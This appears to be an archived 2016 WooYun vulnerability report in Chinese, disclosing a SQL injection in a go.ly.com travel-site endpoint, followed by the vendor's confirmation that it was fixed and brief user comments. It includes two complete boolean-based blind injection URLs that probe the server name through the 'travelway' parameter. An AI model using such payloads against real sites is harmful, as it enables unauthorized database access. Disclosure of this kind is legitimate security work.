苏州同程某站SQL注入一枚

编号185861
Urlhttp://www.wooyun.org/bug.php?action=view&id=185861
漏洞状态厂商已经修复
漏洞标题苏州同程某站SQL注入一枚
漏洞类型SQL注射漏洞
厂商苏州同程旅游网络科技有限公司
白帽子路人甲
提交日期2016-03-17 20:57:00
公开日期2016-03-18 16:23:00
修复时间2016-03-18 16:23:00
确认时间2016-03-18 00:00:00
Confirm Spend1
漏洞标签SQL注入
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank18
漏洞简介
Tangscan的插件666,waf不是万能的,没有waf又万万不能。
漏洞细节

tangsacan.jpg


 WooYun: 神器而已之苏州同程旅游SQL注入漏洞 
难道这个漏洞,你以为加上waf就没用了吗?我没玩过mssql。
所以你还是老老实实从源头修起吧。


返回正确
go.ly.com/ajax/GetNewRaiderInfo?type=1&desItemId=&desItemKind=&travelway='邮轮') and left(@@SERVERNAME,1)='t' and ('x'='x'&pageSize=12&pageindex=1&viewtype=1&iid=0.9737567349802703


true.png


返回错误
go.ly.com/ajax/GetNewRaiderInfo?type=1&desItemId=&desItemKind=&travelway='邮轮') and left(@@SERVERNAME,1)='x' and ('x'='x'&pageSize=12&pageindex=1&viewtype=1&iid=0.9737567349802703


false.png

POC

修复方案

源头修起、

状态信息 2016-03-17: 细节已通知厂商并且等待厂商处理中
2016-03-18: 厂商已经确认,细节仅向厂商公开
2016-03-18: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复同一个参数又被报,打脸啊,开发传错机器了...是有从代码层面修来着
∠( ᐛ 」∠)_
回应信息危害等级:高漏洞Rank:18 确认时间:2016-03-18 10:53
Showing 1-4 of 4 items.
评论内容评论人点赞数评论时间

@苏州同程旅游网络科技有限公司 小吴同志又被打脸了

冰杰02016-03-18 12:45:00

qiugongkai

hear7v02016-03-18 10:56:00

what?

小川02016-03-17 21:53:00

666

whynot02016-03-17 21:20:00